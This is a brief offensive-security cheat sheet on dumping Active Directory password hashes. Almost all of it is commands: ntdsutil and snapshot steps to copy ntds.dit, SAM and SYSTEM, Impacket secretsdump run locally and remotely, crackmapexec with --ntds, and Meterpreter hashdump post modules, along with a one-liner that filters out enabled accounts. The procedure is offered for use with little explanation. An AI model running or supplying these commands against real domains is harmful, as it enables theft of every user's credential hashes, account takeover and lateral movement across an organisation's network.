Dumping domain hashes


powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
-- or --

> snapshot
> activate instance ntds
> create
> mount {GUID}

Then browse to the mounted directory in the C:/ and copy out the ntds.dit && SAM & SYSTEM file to your prefered location

To delete the snapshot after:

delete {GUID}

Then pull the hashes out with Impacket's Secretdump

impacket-secretsdump -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash -user-status -outputfile myhashes local

You cna also dump them remotely:

secretsdump.py -sam sam.save -security security.save -system system.save -outputfile secretsdump domain.lan/tester1:tester1@

The tidy up the hashes

cat myhashes.ntds | grep -v "$:" | grep "status=Enabled" | cut -d'\' -f2 | cut -d"(" -f1

Or you can do it with a 1 liner remotely. but becareful it doesnt crash the connection

impacket-secretsdump -just-dc -user-status -exec-method smbexec 'domaincorp/user123:Password1@' -outputfile myhashes


crackmapexec smb <DC-IP> -u <user> -p <password> --ntds


Once you have your Meterpreter shell from your exploit of choice, such as PSEXEC

run post/windows/gather/smart_hashdump
--- or ---
run post/windows/gather/credentials/domain_hashdump

Last updated